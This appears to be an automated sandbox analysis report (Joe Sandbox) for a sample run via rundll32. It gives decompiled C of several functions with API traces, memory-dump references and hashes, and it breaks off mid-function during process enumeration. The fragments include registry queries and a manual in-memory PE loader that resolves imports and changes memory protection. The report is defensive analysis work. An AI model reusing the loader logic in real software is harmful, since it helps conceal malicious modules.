Function 00A1A881, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A1A881(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xa1d230; // 0x4a6a5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xa1ea60; // 0x4f0053
				_v16 = 4;
				_t31 = E00A1230C(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xa1d230; // 0x4a6a5a8
					_t5 = _t19 + 0xa1eabc; // 0x6e0049
					_t34 = E00A1230C(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00A1A07B(_t34);
					}
					E00A1A07B(_t31);
				}
				return _v8;
			}

0x00a1a887
0x00a1a88c
0x00a1a891
0x00a1a898
0x00a1a8a4
0x00a1a8a8
0x00a1a8aa
0x00a1a8b0
0x00a1a8bc
0x00a1a8c0
0x00a1a8d3
0x00a1a8db
0x00a1a8ef
0x00a1a8f7
0x00a1a8f9
0x00a1a8f9
0x00a1a900
0x00a1a900
0x00a1a907
0x00a1a907
0x00a1a90d
0x00a1a912
0x00a1a918

APIs

Part of subcall function 00A1230C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A1A8A4,004F0053,00000000,?), ref: 00A12315
Part of subcall function 00A1230C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A1A8A4,004F0053,00000000,?), ref: 00A1233F
Part of subcall function 00A1230C: memset.NTDLL ref: 00A12353

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00A1A8D3
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00A1A8EF
RegCloseKey.ADVAPI32(00000000), ref: 00A1A900

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: fd0ee69c8f74c5c3cc298a748043d1b0768ad2486763a433ebdadc5b4b94032b
Instruction ID: 5f26011fadc08494893de3ef93c93c190b7f67f9d4c236a074d1ac72e6b3f679
Opcode Fuzzy Hash: fd0ee69c8f74c5c3cc298a748043d1b0768ad2486763a433ebdadc5b4b94032b
Instruction Fuzzy Hash: 4311AD76600208BFDB11DBE4CD85FEE73BCAB08340F104099F602E7051D774DA858B65

Uniqueness

Uniqueness Score: -1.00%

Function 00A1974B, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A1974B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00A18291(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xa1d230; // 0x4a6a5a8
						_t20 = _t68 + 0xa1e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00A196FE(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00a19751
0x00a19754
0x00a19764
0x00a1976d
0x00a19771
0x00a1983f
0x00a19845
0x00a19845
0x00a1978b
0x00a19790
0x00a19794
0x00a1979a
0x00a1979f
0x00a197a6
0x00a197b5
0x00a197b5
0x00a197b9
0x00a197bb
0x00a197c7
0x00a197d2
0x00a197dd
0x00a197e1
0x00a197eb
0x00a197ef
0x00a197f1
0x00a197f6
0x00a197fd
0x00a1980d
0x00a1980d
0x00a197f6
0x00a197ef
0x00a1980f
0x00a19814
0x00a19819
0x00a19819
0x00a1981f
0x00a19825
0x00a1982a
0x00a1982a
0x00a1982f
0x00a19834
0x00a19834
0x00a1982f
0x00a197b9
0x00a19836
0x00a1983c
0x00000000

APIs

Part of subcall function 00A18291: SysAllocString.OLEAUT32(80000002), ref: 00A182E8
Part of subcall function 00A18291: SysFreeString.OLEAUT32(00000000), ref: 00A1834D

SysFreeString.OLEAUT32(?), ref: 00A1982A
SysFreeString.OLEAUT32(00A18812), ref: 00A19834

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: e6deb51f129e002470109b0a068ef6a599c835c4cbd3959e2a2c7670f3eafff9
Instruction ID: 7f29afe682b557b2d266ae769dcd155f9c7f86118620040d8669287296c000bb
Opcode Fuzzy Hash: e6deb51f129e002470109b0a068ef6a599c835c4cbd3959e2a2c7670f3eafff9
Instruction Fuzzy Hash: 54313976900119AFCB21DF99C998CDBBB7AFFCA740B148658F8159B210D731DD91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A18393, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A18393(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E00A14F6C(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E00A17A7D(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0xa1d1f0, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x00a1839b
0x00a183f0
0x00a183f5
0x00a1839d
0x00a183b7
0x00a183bb
0x00a183c0
0x00a183c2
0x00a183d2
0x00a183de
0x00a183c4
0x00a183c4
0x00a183c7
0x00a183cc
0x00a183cc
0x00a183c2
0x00a183bb
0x00a183fb

APIs

Part of subcall function 00A17A7D: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00A18849,3D00A1C0,80000002,00A1262A,00000000,00A1262A,?,65696C43,80000002), ref: 00A17ABF
Part of subcall function 00A17A7D: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00A18849,3D00A1C0,80000002,00A1262A,00000000,00A1262A,?,65696C43), ref: 00A17AE4
Part of subcall function 00A17A7D: RegCloseKey.ADVAPI32(80000002,?,00A18849,3D00A1C0,80000002,00A1262A,00000000,00A1262A,?,65696C43,80000002,00000000,?), ref: 00A17B14

HeapFree.KERNEL32(00000000,?,00000000,80000002,747DF710,?,?,747DF710,00000000,?,00A14B5F,?,004F0053,05489328,00000000,?), ref: 00A183DE

Strings

Uxt, xrefs: 00A183DE

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: QueryValue$CloseFreeHeap
String ID: Uxt
API String ID: 2109406458-1536154274
Opcode ID: 66621b08b34d4293b6b2d9a31d1d612f6e365caf5c06da33fd5ee147e5c0fdbd
Instruction ID: a7e0ee080af727db21492cc4477ab8860ce36b09ec05b0cd40538cd30e91e915
Opcode Fuzzy Hash: 66621b08b34d4293b6b2d9a31d1d612f6e365caf5c06da33fd5ee147e5c0fdbd
Instruction Fuzzy Hash: 3B01E832140689EBCB128F44CC05FEA3B75EB94B60F188429FA658E160DA71D961DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A53C, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement( &E00A1D1F4) == 0) {
						E00A14ACE();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement( &E00A1D1F4) == 1) {
						_t10 = E00A124C2(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x00a1a543
0x00a1a544
0x00a1a547
0x00a1a579
0x00a1a57b
0x00a1a57b
0x00a1a549
0x00a1a54a
0x00a1a55f
0x00a1a566
0x00a1a568
0x00a1a568
0x00a1a566
0x00a1a54a
0x00a1a583

APIs

InterlockedIncrement.KERNEL32(00A1D1F4), ref: 00A1A551

Part of subcall function 00A124C2: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00A124D7

InterlockedDecrement.KERNEL32(00A1D1F4), ref: 00A1A571

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: d9e686a6c1f2e967f5bd8c13abdd71a1d1cae8cb9fadca96d1e06bb10d307025
Instruction ID: 2caaa0372dcbe0c8a0c7268df61a43cdb7c2ce4f75345120a7a83f2be129cf31
Opcode Fuzzy Hash: d9e686a6c1f2e967f5bd8c13abdd71a1d1cae8cb9fadca96d1e06bb10d307025
Instruction Fuzzy Hash: A3E04F3138E132A7C62157B68D05BEA6B52AF747F0F014614F585D4050E620CDD186A7

Uniqueness

Uniqueness Score: -1.00%

Function 6FC415F2, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6FC415F2(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6FC41F65( &_v8,  &_v12,  *0x6fc4414c ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6FC41D76(_t22, _v8,  *0x6fc4414c ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_v12 = E6FC41B13(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6fc44110, 0, _v8);
				}
				return _t25;
			}

0x6fc415f2
0x6fc415f5
0x6fc415f6
0x6fc4160c
0x6fc41615
0x6fc4161a
0x6fc41633
0x6fc4161c
0x6fc4162f
0x6fc4162f
0x6fc41637
0x6fc41641
0x6fc41649
0x6fc41651
0x6fc41653
0x6fc41653
0x6fc41651
0x6fc41663
0x6fc41663
0x6fc4166e

APIs

StrStrIA.KERNELBASE(00000000,?,?,?,?,00000000,00000000,?,?,?,6FC41069), ref: 6FC41649
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,?,?,6FC41069), ref: 6FC41663

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4bff2849b8dc577f2901ed0178ca67ce49248b90b711f6089a7a8fec137a164c
Instruction ID: 83fefbbf14ddb8d147abafb61ffe2a1306db51bd7e9f82f7e440ae16ecc68c19
Opcode Fuzzy Hash: 4bff2849b8dc577f2901ed0178ca67ce49248b90b711f6089a7a8fec137a164c
Instruction Fuzzy Hash: B001A776900619FBDB029FA9CD00EDF7BBDEB85660F150262EA41E3144F731DA259BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A14F6C, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00A14F6C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xa1d230; // 0x4a6a5a8
				_t4 = _t15 + 0xa1e394; // 0x548893c
				_t20 = _t4;
				_t6 = _t15 + 0xa1e124; // 0x650047
				_t17 = E00A1974B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00A1230C(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00a14f76
0x00a14f78
0x00a14f7f
0x00a14f80
0x00a14f81
0x00a14f82
0x00a14f88
0x00a14f8d
0x00a14f8d
0x00a14f97
0x00a14fa9
0x00a14fb0
0x00a14fdf
0x00a14fb2
0x00a14fb7
0x00a14fdc
0x00a14fb9
0x00a14fbc
0x00a14fc3
0x00a14fce
0x00a14fc5
0x00a14fc8
0x00a14fc8
0x00a14fd2
0x00a14fd2
0x00a14fb7
0x00a14fe6

APIs

Part of subcall function 00A1974B: SysFreeString.OLEAUT32(?), ref: 00A1982A

Part of subcall function 00A1230C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A1A8A4,004F0053,00000000,?), ref: 00A12315
Part of subcall function 00A1230C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A1A8A4,004F0053,00000000,?), ref: 00A1233F
Part of subcall function 00A1230C: memset.NTDLL ref: 00A12353

SysFreeString.OLEAUT32(00000000), ref: 00A14FD2

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: b9faef52680e53f3059c27d58b5c6372c0488b7d9f1de9bfbd4a43765d790ed7
Instruction ID: 0f7036ac4f8c62f1eb0c4135be051fcb77f20d13f1d08c4596a65b3e24a3336f
Opcode Fuzzy Hash: b9faef52680e53f3059c27d58b5c6372c0488b7d9f1de9bfbd4a43765d790ed7
Instruction Fuzzy Hash: 13015A32504029BFDB11DFA8CD04DEEBBB9FB08B50B014965E911E7261E37099A6D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1AB36, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A1AB36() {

				E00A1AC16(0xa1c35c, 0xa1d12c); // executed
				goto __eax;
			}

0x00a1ab48
0x00a1ab4f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00A1AB48

Part of subcall function 00A1AC16: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1AC8F

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 77c70922dac95327a9c5f9ea4ef32754a43870ac57d6f31d659e031e4699a5c4
Instruction ID: 7daeb4aaf8f778cf1350deb7d1a434cb556002a6784149a8e0fa3b5294c7b6c4
Opcode Fuzzy Hash: 77c70922dac95327a9c5f9ea4ef32754a43870ac57d6f31d659e031e4699a5c4
Instruction Fuzzy Hash: BFB012F139E000FD310411912E06CF6412DC0D0B30330C61AF401C4040D5409CC01073

Uniqueness

Uniqueness Score: -1.00%

Function 00A1AB51, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A1AB51() {

				E00A1AC16(0xa1c35c, 0xa1d128); // executed
				goto __eax;
			}

0x00a1ab48
0x00a1ab4f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00A1AB48

Part of subcall function 00A1AC16: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1AC8F

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: b6964d09a117d44bcab66b9baabe58b9956228e37f72e48502b9474538aa63eb
Instruction ID: 947ef8efbfbc093b40da29deff63f662483a7e5d3f95a359ec051eca6b6b966e
Opcode Fuzzy Hash: b6964d09a117d44bcab66b9baabe58b9956228e37f72e48502b9474538aa63eb
Instruction Fuzzy Hash: 99B012E139E100FD314451442E06CF6416CC0D4B30330C71AF401C5140D4440CC01073

Uniqueness

Uniqueness Score: -1.00%

Function 6FC41252, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6FC41252(void* __eax, void* __edx) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t23;
				long _t25;
				long _t28;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t36;
				intOrPtr _t38;

				_t31 = __edx;
				_t35 = __eax;
				_t17 = E6FC41314( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t34 = _v8;
					_t28 = E6FC416DB( &_v8, _t34, _t35);
					if(_t28 == 0) {
						_t38 =  *((intOrPtr*)(_t34 + 0x3c)) + _t34;
						_t23 = E6FC41792(_t34, _t38); // executed
						_t28 = _t23;
						if(_t28 == 0) {
							_t25 = E6FC41CCA(_t38, _t31, _t34); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t34);
								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t34))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t36 = _v12;
					 *((intOrPtr*)(_t36 + 0x18))( *((intOrPtr*)(_t36 + 0x1c))( *_t36));
					E6FC419CF(_t36);
					L8:
					return _t28;
				}
			}

0x6fc41252
0x6fc4125a
0x6fc41277
0x6fc4127e
0x6fc412dd
0x00000000
0x6fc41280
0x6fc41280
0x6fc4128a
0x6fc4128e
0x6fc41293
0x6fc41297
0x6fc4129c
0x6fc412a0
0x6fc412a5
0x6fc412aa
0x6fc412ae
0x6fc412b3
0x6fc412b4
0x6fc412b8
0x6fc412bd
0x6fc412c5
0x6fc412c5
0x6fc412bd
0x6fc412ae
0x6fc412a0
0x6fc412c7
0x6fc412d0
0x6fc412d4
0x6fc412de
0x6fc412e4
0x6fc412e4

APIs

Part of subcall function 6FC41314: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,6FC4127C,?,?,?,00000002,?,?,?), ref: 6FC41339
Part of subcall function 6FC41314: GetProcAddress.KERNEL32(00000000,?), ref: 6FC4135B
Part of subcall function 6FC41314: GetProcAddress.KERNEL32(00000000,?), ref: 6FC41371
Part of subcall function 6FC41314: GetProcAddress.KERNEL32(00000000,?), ref: 6FC41387
Part of subcall function 6FC41314: GetProcAddress.KERNEL32(00000000,?), ref: 6FC4139D
Part of subcall function 6FC41314: GetProcAddress.KERNEL32(00000000,?), ref: 6FC413B3

Part of subcall function 6FC416DB: memcpy.NTDLL(?,00000002,6FC4128A,?,0000000A,?,?,?,6FC4128A,?,0000000A,?,?,?,00000002), ref: 6FC41708
Part of subcall function 6FC416DB: memcpy.NTDLL(?,00000002,?,00000002,?,?,?,?), ref: 6FC4173B

Part of subcall function 6FC41792: LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 6FC417C8
Part of subcall function 6FC41792: lstrlenA.KERNEL32(00000002), ref: 6FC417DE
Part of subcall function 6FC41792: memset.NTDLL ref: 6FC417E8
Part of subcall function 6FC41792: GetProcAddress.KERNEL32(?,00000002), ref: 6FC4184B
Part of subcall function 6FC41792: lstrlenA.KERNEL32(-00000002), ref: 6FC41860
Part of subcall function 6FC41792: memset.NTDLL ref: 6FC4186A

Part of subcall function 6FC41CCA: VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 6FC41CF8
Part of subcall function 6FC41CCA: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 6FC41D4F
Part of subcall function 6FC41CCA: GetLastError.KERNEL32(?,?), ref: 6FC41D55

GetLastError.KERNEL32(?,?,?,?), ref: 6FC412BF

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
String ID:
API String ID: 33504255-0
Opcode ID: d1ed8a1b8aedc8405603ce1e5c5c5f9d41a2a0e322e9f7cc0baf514c62e81a1d
Instruction ID: 2597b00d37f8924292aa0b0100a77c34b77fb46a56347d21103d43f557676e93
Opcode Fuzzy Hash: d1ed8a1b8aedc8405603ce1e5c5c5f9d41a2a0e322e9f7cc0baf514c62e81a1d
Instruction Fuzzy Hash: FF11A9726007156BD7226AED8C85E9B77FCAF46218B000528EA81D7640FB64FD1987A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A198B3, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A198B3(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00a198b3
0x00a198c0
0x00a198c1
0x00a198c2
0x00a198c9
0x00a198f7
0x00a198f8
0x00a198fb
0x00a19901
0x00000000
0x00000000
0x00a198e0
0x00a198ea
0x00a198f1
0x00000000
0x00a198e2
0x00a198e5
0x00a19905
0x00a198e7
0x00a198e7
0x00000000
0x00a198e7
0x00a198e5
0x00a1990c
0x00a19912
0x00a19912
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00A198FB

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9e4f0e57fab123c34180658f80fa1dc2577a84d3718025b7fdd24dca7f3db382
Instruction ID: c441a45e739ca469b8b58cf805d8238f32fd2c2f25c68e19cd792590b1465f55
Opcode Fuzzy Hash: 9e4f0e57fab123c34180658f80fa1dc2577a84d3718025b7fdd24dca7f3db382
Instruction Fuzzy Hash: EBF04975C01218EFDB00DBD4C898AEEB7B8FF09304F1480AAE512A3200E3B46B80DF51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A1229C, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A1229C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
